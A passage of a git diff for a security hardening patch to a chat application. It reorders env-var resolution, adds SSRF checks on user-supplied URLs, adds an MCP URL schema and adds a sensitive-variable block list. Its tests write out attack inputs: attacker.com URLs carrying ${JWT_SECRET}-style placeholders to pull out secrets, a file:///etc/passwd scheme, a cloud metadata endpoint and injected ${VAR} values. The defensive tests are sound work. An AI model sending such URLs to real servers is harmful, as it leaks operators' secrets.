expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); + + it('falls back to default and warns for Infinity', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'Infinity'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); +}); diff --git a/packages/api/src/utils/env.spec.ts b/packages/api/src/utils/env.spec.ts index c241cb2b51..e1244fa605 100644 --- a/packages/api/src/utils/env.spec.ts +++ b/packages/api/src/utils/env.spec.ts @@ -111,12 +111,12 @@ describe('encodeHeaderValue', () => { describe('resolveHeaders', () => { beforeEach(() => { process.env.TEST_API_KEY = 'test-api-key-value'; - process.env.ANOTHER_SECRET = 'another-secret-value'; + process.env.ANOTHER_VALUE = 'another-test-value'; }); afterEach(() => { delete process.env.TEST_API_KEY; - delete process.env.ANOTHER_SECRET; + delete process.env.ANOTHER_VALUE; }); it('should return empty object when headers is undefined', () => { @@ -139,7 +139,7 @@ describe('resolveHeaders', () => { it('should process environment variables in headers', () => { const headers = { Authorization: '${TEST_API_KEY}', - 'X-Secret': '${ANOTHER_SECRET}', + 'X-Secret': '${ANOTHER_VALUE}', 'Content-Type': 'application/json', }; @@ -147,7 +147,7 @@ describe('resolveHeaders', () => { expect(result).toEqual({ Authorization: 'test-api-key-value', - 'X-Secret': 'another-secret-value', + 'X-Secret': 'another-test-value', 'Content-Type': 'application/json', }); }); @@ -526,6 +526,40 @@ describe('resolveHeaders', () => { expect(result['X-Conversation']).toBe('conv-123'); }); + it('should not resolve env vars introduced via LIBRECHAT_BODY placeholders', () => { + const body = { + conversationId: '${TEST_API_KEY}', + parentMessageId: '${TEST_API_KEY}', + messageId: '${TEST_API_KEY}', + }; + const headers = { + 'X-Conv': '{{LIBRECHAT_BODY_CONVERSATIONID}}', + 'X-Parent': '{{LIBRECHAT_BODY_PARENTMESSAGEID}}', + 'X-Msg': '{{LIBRECHAT_BODY_MESSAGEID}}', + }; + const result = resolveHeaders({ headers, body }); + + expect(result['X-Conv']).toBe('${TEST_API_KEY}'); + expect(result['X-Parent']).toBe('${TEST_API_KEY}'); + expect(result['X-Msg']).toBe('${TEST_API_KEY}'); + }); + + it('should not resolve env vars introduced via LIBRECHAT_USER placeholders', () => { + const user = createTestUser({ name: '${TEST_API_KEY}' }); + const headers = { 'X-Name': '{{LIBRECHAT_USER_NAME}}' }; + const result = resolveHeaders({ headers, user }); + + expect(result['X-Name']).toBe('${TEST_API_KEY}'); + }); + + it('should not resolve env vars introduced via customUserVars', () => { + const customUserVars = { MY_TOKEN: '${TEST_API_KEY}' }; + const headers = { Authorization: 'Bearer {{MY_TOKEN}}' }; + const result = resolveHeaders({ headers, customUserVars }); + + expect(result.Authorization).toBe('Bearer ${TEST_API_KEY}'); + }); + describe('non-string header values (type guard tests)', () => { it('should handle numeric header values without crashing', () => { const headers = { @@ -657,12 +691,12 @@ describe('resolveHeaders', () => { describe('resolveNestedObject', () => { beforeEach(() => { process.env.TEST_API_KEY = 'test-api-key-value'; - process.env.ANOTHER_SECRET = 'another-secret-value'; + process.env.ANOTHER_VALUE = 'another-test-value'; }); afterEach(() => { delete process.env.TEST_API_KEY; - delete process.env.ANOTHER_SECRET; + delete process.env.ANOTHER_VALUE; }); it('should preserve nested object structure', () => { @@ -952,7 +986,7 @@ describe('resolveNestedObject', () => { describe('processMCPEnv', () => { beforeEach(() => { process.env.TEST_API_KEY = 'test-api-key-value'; - process.env.ANOTHER_SECRET = 'another-secret-value'; + process.env.ANOTHER_VALUE = 'another-test-value'; process.env.OAUTH_CLIENT_ID = 'oauth-client-id-value'; process.env.OAUTH_CLIENT_SECRET = 'oauth-client-secret-value'; process.env.MCP_SERVER_URL = 'https://mcp.example.com'; @@ -960,7 +994,7 @@ describe('processMCPEnv', () => { afterEach(() => { delete process.env.TEST_API_KEY; - delete process.env.ANOTHER_SECRET; + delete process.env.ANOTHER_VALUE; delete process.env.OAUTH_CLIENT_ID; delete process.env.OAUTH_CLIENT_SECRET; delete process.env.MCP_SERVER_URL; @@ -977,7 +1011,7 @@ describe('processMCPEnv', () => { command: 'mcp-server', env: { API_KEY: '${TEST_API_KEY}', - SECRET: '${ANOTHER_SECRET}', + SECRET: '${ANOTHER_VALUE}', PLAIN_VALUE: 'plain-text', }, args: ['--key', '${TEST_API_KEY}', '--url', '${MCP_SERVER_URL}'], @@ -990,7 +1024,7 @@ describe('processMCPEnv', () => { command: 'mcp-server', env: { API_KEY: 'test-api-key-value', - SECRET: 'another-secret-value', + SECRET: 'another-test-value', PLAIN_VALUE: 'plain-text', }, args: ['--key', 'test-api-key-value', '--url', 'https://mcp.example.com'], @@ -1137,6 +1171,49 @@ describe('processMCPEnv', () => { }); }); + it('should not resolve env vars introduced via body placeholders in MCP headers', () => { + const body = { + conversationId: '${TEST_API_KEY}', + parentMessageId: '${TEST_API_KEY}', + messageId: '${TEST_API_KEY}', + }; + + const options: MCPOptions = { + type: 'streamable-http', + url: 'https://api.example.com', + headers: { + 'X-Conv': '{{LIBRECHAT_BODY_CONVERSATIONID}}', + 'X-Parent': '{{LIBRECHAT_BODY_PARENTMESSAGEID}}', + }, + }; + + const result = processMCPEnv({ options, body }); + + if (!isStreamableHTTPOptions(result)) { + throw new Error('Expected streamable-http options'); + } + expect(result.headers?.['X-Conv']).toBe('${TEST_API_KEY}'); + expect(result.headers?.['X-Parent']).toBe('${TEST_API_KEY}'); + }); + + it('should not resolve env vars introduced via customUserVars in MCP headers', () => { + const customUserVars = { MY_TOKEN: '${TEST_API_KEY}' }; + const options: MCPOptions = { + type: 'streamable-http', + url: 'https://api.example.com', + headers: { + Authorization: 'Bearer {{MY_TOKEN}}', + }, + }; + + const result = processMCPEnv({ options, customUserVars }); + + if (!isStreamableHTTPOptions(result)) { + throw new Error('Expected streamable-http options'); + } + expect(result.headers?.Authorization).toBe('Bearer ${TEST_API_KEY}'); + }); + it('should handle mixed placeholders in OAuth configuration', () => { const user = createTestUser({ id: 'user-123', diff --git a/packages/api/src/utils/env.ts b/packages/api/src/utils/env.ts index 78d6f9ebdf..adeeb24b34 100644 --- a/packages/api/src/utils/env.ts +++ b/packages/api/src/utils/env.ts @@ -226,9 +226,20 @@ function processSingleValue({ let value = originalValue; + /** + * SECURITY INVARIANT — ordering matters: + * Resolve env vars on the admin-authored template BEFORE any user-controlled + * data is substituted (customUserVars, user fields, OIDC tokens, body placeholders). + * This prevents second-order injection where user values containing ${VAR} + * patterns would otherwise be expanded against process.env. + */ + if (!dbSourced) { + value = extractEnvVariable(value); + } + + /** Runs for both dbSourced and non-dbSourced — it is the only resolution DB-stored servers get */ if (customUserVars) { for (const [varName, varVal] of Object.entries(customUserVars)) { - /** Escaped varName for use in regex to avoid issues with special characters */ const escapedVarName = varName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); const placeholderRegex = new RegExp(`\\{\\{${escapedVarName}\\}\\}`, 'g'); value = value.replace(placeholderRegex, varVal); @@ -250,8 +261,6 @@ function processSingleValue({ value = processBodyPlaceholders(value, body); } - value = extractEnvVariable(value); - return value; } diff --git a/packages/api/src/utils/events.ts b/packages/api/src/utils/events.ts index 20c9583993..e084e631f5 100644 --- a/packages/api/src/utils/events.ts +++ b/packages/api/src/utils/events.ts @@ -2,14 +2,11 @@ import type { Response as ServerResponse } from 'express'; import type { ServerSentEvent } from '~/types'; /** - * Sends message data in Server Sent Events format. - * @param res - The server response. - * @param event - The message event. - * @param event.event - The type of event. - * @param event.data - The message to be sent. + * Sends a Server-Sent Event to the client. + * Empty-string StreamEvent data is silently dropped. */ export function sendEvent(res: ServerResponse, event: ServerSentEvent): void { - if (typeof event.data === 'string' && event.data.length === 0) { + if ('data' in event && typeof event.data === 'string' && event.data.length === 0) { return; } res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); diff --git a/packages/api/src/utils/import.ts b/packages/api/src/utils/import.ts new file mode 100644 index 0000000000..94a2c8f818 --- /dev/null +++ b/packages/api/src/utils/import.ts @@ -0,0 +1,20 @@ +import { logger } from '@librechat/data-schemas'; + +/** 250 MiB — default max file size for conversation imports */ +export const DEFAULT_IMPORT_MAX_FILE_SIZE = 262144000; + +/** Resolves the import file-size limit from the env var, falling back to the 250 MiB default */ +export function resolveImportMaxFileSize(): number { + const raw = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + if (!raw) { + return DEFAULT_IMPORT_MAX_FILE_SIZE; + } + const parsed = Number(raw); + if (!Number.isFinite(parsed) || parsed <= 0) { + logger.warn( + `[imports] Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES="${raw}"; using default ${DEFAULT_IMPORT_MAX_FILE_SIZE}`, + ); + return DEFAULT_IMPORT_MAX_FILE_SIZE; + } + return parsed; +} diff --git a/packages/api/src/utils/index.ts b/packages/api/src/utils/index.ts index 441c2e02d7..5b9315d8c7 100644 --- a/packages/api/src/utils/index.ts +++ b/packages/api/src/utils/index.ts @@ -6,6 +6,7 @@ export * from './email'; export * from './env'; export * from './events'; export * from './files'; +export * from './import'; export * from './generators'; export * from './graph'; export * from './path'; diff --git a/packages/api/src/web/web.spec.ts b/packages/api/src/web/web.spec.ts index c7bb3f4962..74e02b20ef 100644 --- a/packages/api/src/web/web.spec.ts +++ b/packages/api/src/web/web.spec.ts @@ -18,6 +18,14 @@ jest.mock('../utils', () => ({ }, })); +const mockIsSSRFTarget = jest.fn().mockReturnValue(false); +const mockResolveHostnameSSRF = jest.fn().mockResolvedValue(false); + +jest.mock('../auth', () => ({ + isSSRFTarget: (...args: unknown[]) => mockIsSSRFTarget(...args), + resolveHostnameSSRF: (...args: unknown[]) => mockResolveHostnameSSRF(...args), +})); + describe('web.ts', () => { describe('extractWebSearchEnvVars', () => { it('should return empty array if config is undefined', () => { @@ -1227,4 +1235,356 @@ describe('web.ts', () => { expect(result.authResult.firecrawlOptions).toBeUndefined(); // Should be undefined }); }); + + describe('SSRF protection for user-provided URLs', () => { + const userId = 'test-user-id'; + let mockLoadAuthValues: jest.Mock; + + beforeEach(() => { + jest.clearAllMocks(); + mockLoadAuthValues = jest.fn(); + mockIsSSRFTarget.mockReturnValue(false); + mockResolveHostnameSSRF.mockResolvedValue(false); + }); + + it('should block user-provided jinaApiUrl targeting localhost', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === 'localhost'); + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'JINA_API_URL') { + result[field] = 'http://localhost:8080/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.jinaApiUrl).toBeUndefined(); + expect(mockIsSSRFTarget).toHaveBeenCalledWith('localhost'); + }); + + it('should block user-provided firecrawlApiUrl resolving to private IP', async () => { + mockResolveHostnameSSRF.mockImplementation((hostname: string) => + Promise.resolve(hostname === 'evil.internal-service.com'), + ); + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'https://evil.internal-service.com/scrape'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + const scrapersAuth = result.authTypes.find(([c]) => c === 'scrapers')?.[1]; + expect(scrapersAuth).toBe(AuthType.USER_PROVIDED); + }); + + it('should block user-provided searxngInstanceUrl targeting metadata endpoint', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === '169.254.169.254'); + + const webSearchConfig: TCustomConfig['webSearch'] = { + searxngInstanceUrl: '${SEARXNG_INSTANCE_URL}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + searchProvider: 'searxng' as SearchProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'SEARXNG_INSTANCE_URL') { + result[field] = 'http://169.254.169.254/latest/meta-data'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.searxngInstanceUrl).toBeUndefined(); + expect(result.authenticated).toBe(false); + }); + + it('should allow system-defined URLs even if they match SSRF patterns', async () => { + mockIsSSRFTarget.mockReturnValue(true); + + const originalEnv = process.env; + try { + process.env = { + ...originalEnv, + JINA_API_KEY: 'system-jina-key', + JINA_API_URL: 'http://jina-internal:8080/rerank', + }; + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'JINA_API_KEY') { + result[field] = 'system-jina-key'; + } else if (field === 'JINA_API_URL') { + result[field] = 'http://jina-internal:8080/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.jinaApiUrl).toBe('http://jina-internal:8080/rerank'); + expect(result.authenticated).toBe(true); + } finally { + process.env = originalEnv; + } + }); + + it('should reject URLs with invalid format', async () => { + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'not-a-valid-url'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + const scrapersAuth = result.authTypes.find(([c]) => c === 'scrapers')?.[1]; + expect(scrapersAuth).toBe(AuthType.USER_PROVIDED); + }); + + it('should reject non-HTTP schemes like file://', async () => { + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'file:///etc/passwd'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + }); + + it('should allow legitimate external URLs', async () => { + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'https://api.firecrawl.dev'; + } else if (field === 'JINA_API_URL') { + result[field] = 'https://api.jina.ai/v1/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBe('https://api.firecrawl.dev'); + expect(result.authResult.jinaApiUrl).toBe('https://api.jina.ai/v1/rerank'); + expect(result.authenticated).toBe(true); + }); + + it('should fail required URL field and mark category unauthenticated', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === '127.0.0.1'); + + const webSearchConfig: TCustomConfig['webSearch'] = { + searxngInstanceUrl: '${SEARXNG_INSTANCE_URL}', + searxngApiKey: '${SEARXNG_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + searchProvider: 'searxng' as SearchProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'SEARXNG_INSTANCE_URL') { + result[field] = 'http://127.0.0.1:8888/search'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authenticated).toBe(false); + const providersAuthType = result.authTypes.find( + ([category]) => category === 'providers', + )?.[1]; + expect(providersAuthType).toBe(AuthType.USER_PROVIDED); + }); + + it('should report SYSTEM_DEFINED when only user-provided field is a stripped SSRF URL', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === 'localhost'); + + const originalEnv = process.env; + try { + process.env = { + ...originalEnv, + JINA_API_KEY: 'system-jina-key', + }; + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'JINA_API_KEY') { + result[field] = 'system-jina-key'; + } else if (field === 'JINA_API_URL') { + result[field] = 'http://localhost:9999/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.jinaApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + const rerankersAuth = result.authTypes.find(([c]) => c === 'rerankers')?.[1]; + expect(rerankersAuth).toBe(AuthType.SYSTEM_DEFINED); + } finally { + process.env = originalEnv; + } + }); + }); }); diff --git a/packages/api/src/web/web.ts b/packages/api/src/web/web.ts index ad172e187f..cc0d8688ca 100644 --- a/packages/api/src/web/web.ts +++ b/packages/api/src/web/web.ts @@ -13,6 +13,37 @@ import type { TWebSearchConfig, } from 'librechat-data-provider'; import type { TWebSearchKeys, TWebSearchCategories } from '@librechat/data-schemas'; +import { isSSRFTarget, resolveHostnameSSRF } from '../auth'; + +/** + * URL-type keys in TWebSearchKeys (not API keys or version strings). + * Must stay in sync with URL-typed fields in webSearchAuth (packages/data-schemas). + */ +const WEB_SEARCH_URL_KEYS = new Set([ + 'searxngInstanceUrl', + 'firecrawlApiUrl', + 'jinaApiUrl', +]); + +/** + * Returns true if the URL should be blocked for SSRF risk. + * Fail-closed: unparseable URLs and non-HTTP(S) schemes return true. + */ +async function isSSRFUrl(url: string): Promise { + let parsed: URL; + try { + parsed = new URL(url); + } catch { + return true; + } + if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') { + return true; + } + if (isSSRFTarget(parsed.hostname)) { + return true; + } + return resolveHostnameSSRF(parsed.hostname); +} export function extractWebSearchEnvVars({ keys, @@ -149,12 +180,27 @@ export async function loadWebSearchAuth({ const field = allAuthFields[j]; const value = authValues[field]; const originalKey = allKeys[j]; - if (originalKey) authResult[originalKey] = value; + if (!optionalSet.has(field) && !value) { allFieldsAuthenticated = false; break; } - if (!isUserProvided && process.env[field] !== value) { + + const isFieldUserProvided = value != null && process.env[field] !== value; + const isUrlKey = originalKey != null && WEB_SEARCH_URL_KEYS.has(originalKey); + let contributed = false; + + if (isUrlKey && isFieldUserProvided && (await isSSRFUrl(value))) { + if (!optionalSet.has(field)) { + allFieldsAuthenticated = false; + break; + } + } else if (originalKey) { + authResult[originalKey] = value; + contributed = true; + } + + if (!isUserProvided && isFieldUserProvided && contributed) { isUserProvided = true; } } diff --git a/packages/data-provider/specs/mcp.spec.ts b/packages/data-provider/specs/mcp.spec.ts new file mode 100644 index 0000000000..573769c4fa --- /dev/null +++ b/packages/data-provider/specs/mcp.spec.ts @@ -0,0 +1,147 @@ +import { SSEOptionsSchema, MCPServerUserInputSchema } from '../src/mcp'; + +describe('MCPServerUserInputSchema', () => { + describe('env variable exfiltration prevention', () => { + it('should confirm admin schema resolves env vars (attack vector baseline)', () => { + process.env.FAKE_SECRET = 'leaked-secret-value'; + const adminResult = SSEOptionsSchema.safeParse({ + type: 'sse', + url: 'http://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(adminResult.success).toBe(true); + if (adminResult.success) { + expect(adminResult.data.url).toContain('leaked-secret-value'); + } + delete process.env.FAKE_SECRET; + }); + + it('should reject the same URL through user input schema', () => { + process.env.FAKE_SECRET = 'leaked-secret-value'; + const userResult = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'http://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(userResult.success).toBe(false); + delete process.env.FAKE_SECRET; + }); + }); + + describe('env variable rejection', () => { + it('should reject SSE URLs containing env variable patterns', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'http://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(result.success).toBe(false); + }); + + it('should reject streamable-http URLs containing env variable patterns', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'streamable-http', + url: 'http://attacker.com/?jwt=${JWT_SECRET}', + }); + expect(result.success).toBe(false); + }); + + it('should reject WebSocket URLs containing env variable patterns', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'ws://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(result.success).toBe(false); + }); + }); + + describe('protocol allowlisting', () => { + it('should reject file:// URLs for SSE', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'file:///etc/passwd', + }); + expect(result.success).toBe(false); + }); + + it('should reject ftp:// URLs for streamable-http', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'streamable-http', + url: 'ftp://internal-server/data', + }); + expect(result.success).toBe(false); + }); + + it('should reject http:// URLs for WebSocket', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'http://example.com/ws', + }); + expect(result.success).toBe(false); + }); + + it('should reject ws:// URLs for SSE', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'ws://example.com/sse', + }); + expect(result.success).toBe(false); + }); + }); + + describe('valid URL acceptance', () => { + it('should accept valid https:// SSE URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'https://mcp-server.com/sse', + }); + expect(result.success).toBe(true); + if (result.success) { + expect(result.data.url).toBe('https://mcp-server.com/sse'); + } + }); + + it('should accept valid http:// SSE URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'http://mcp-server.com/sse', + }); + expect(result.success).toBe(true); + }); + + it('should accept valid wss:// WebSocket URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'wss://mcp-server.com/ws', + }); + expect(result.success).toBe(true); + if (result.success) { + expect(result.data.url).toBe('wss://mcp-server.com/ws'); + } + }); + + it('should accept valid ws:// WebSocket URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'ws://mcp-server.com/ws', + }); + expect(result.success).toBe(true); + }); + + it('should accept valid https:// streamable-http URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'streamable-http', + url: 'https://mcp-server.com/http', + }); + expect(result.success).toBe(true); + if (result.success) { + expect(result.data.url).toBe('https://mcp-server.com/http'); + } + }); + + it('should accept valid http:// streamable-http URLs with "http" alias', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'http', + url: 'http://mcp-server.com/mcp', + }); + expect(result.success).toBe(true); + }); + }); +}); diff --git a/packages/data-provider/specs/utils.spec.ts b/packages/data-provider/specs/utils.spec.ts index 01c403f4e8..48df6d46c2 100644 --- a/packages/data-provider/specs/utils.spec.ts +++ b/packages/data-provider/specs/utils.spec.ts @@ -1,4 +1,4 @@ -import { extractEnvVariable } from '../src/utils'; +import { extractEnvVariable, isSensitiveEnvVar } from '../src/utils'; describe('Environment Variable Extraction', () => { const originalEnv = process.env; @@ -7,7 +7,7 @@ describe('Environment Variable Extraction', () => { process.env = { ...originalEnv, TEST_API_KEY: 'test-api-key-value', - ANOTHER_SECRET: 'another-secret-value', + ANOTHER_VALUE: 'another-value', }; }); @@ -55,7 +55,7 @@ describe('Environment Variable Extraction', () => { describe('extractEnvVariable function', () => { it('should extract environment variables from exact matches', () => { expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value'); - expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value'); + expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value'); }); it('should extract environment variables from strings with prefixes', () => { @@ -82,7 +82,7 @@ describe('Environment Variable Extraction', () => { describe('extractEnvVariable', () => { it('should extract environment variable values', () => { expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value'); - expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value'); + expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value'); }); it('should return the original string if environment variable is not found', () => { @@ -126,4 +126,71 @@ describe('Environment Variable Extraction', () => { ); }); }); + + describe('isSensitiveEnvVar', () => { + it('should flag infrastructure secrets', () => { + expect(isSensitiveEnvVar('JWT_SECRET')).toBe(true); + expect(isSensitiveEnvVar('JWT_REFRESH_SECRET')).toBe(true); + expect(isSensitiveEnvVar('CREDS_KEY')).toBe(true); + expect(isSensitiveEnvVar('CREDS_IV')).toBe(true); + expect(isSensitiveEnvVar('MEILI_MASTER_KEY')).toBe(true); + expect(isSensitiveEnvVar('MONGO_URI')).toBe(true); + expect(isSensitiveEnvVar('REDIS_URI')).toBe(true); + expect(isSensitiveEnvVar('REDIS_PASSWORD')).toBe(true); + }); + + it('should allow non-infrastructure vars through (including operator-configured secrets)', () => { + expect(isSensitiveEnvVar('OPENAI_API_KEY')).toBe(false); + expect(isSensitiveEnvVar('ANTHROPIC_API_KEY')).toBe(false); + expect(isSensitiveEnvVar('GOOGLE_KEY')).toBe(false); + expect(isSensitiveEnvVar('PROXY')).toBe(false); + expect(isSensitiveEnvVar('DEBUG_LOGGING')).toBe(false); + expect(isSensitiveEnvVar('DOMAIN_CLIENT')).toBe(false); + expect(isSensitiveEnvVar('APP_TITLE')).toBe(false); + expect(isSensitiveEnvVar('OPENID_CLIENT_SECRET')).toBe(false); + expect(isSensitiveEnvVar('DISCORD_CLIENT_SECRET')).toBe(false); + expect(isSensitiveEnvVar('MY_CUSTOM_SECRET')).toBe(false); + }); + }); + + describe('extractEnvVariable sensitive var blocklist', () => { + beforeEach(() => { + process.env.JWT_SECRET = 'super-secret-jwt'; + process.env.JWT_REFRESH_SECRET = 'super-secret-refresh'; + process.env.CREDS_KEY = 'encryption-key'; + process.env.CREDS_IV = 'encryption-iv'; + process.env.MEILI_MASTER_KEY = 'meili-key'; + process.env.MONGO_URI = 'mongodb://user:pass@host/db'; + process.env.REDIS_URI = 'redis://:pass@host:6379'; + process.env.REDIS_PASSWORD = 'redis-pass'; + process.env.OPENAI_API_KEY = 'sk-legit-key'; + }); + + it('should refuse to resolve sensitive vars (single-match path)', () => { + expect(extractEnvVariable('${JWT_SECRET}')).toBe('${JWT_SECRET}'); + expect(extractEnvVariable('${JWT_REFRESH_SECRET}')).toBe('${JWT_REFRESH_SECRET}'); + expect(extractEnvVariable('${CREDS_KEY}')).toBe('${CREDS_KEY}'); + expect(extractEnvVariable('${CREDS_IV}')).toBe('${CREDS_IV}'); + 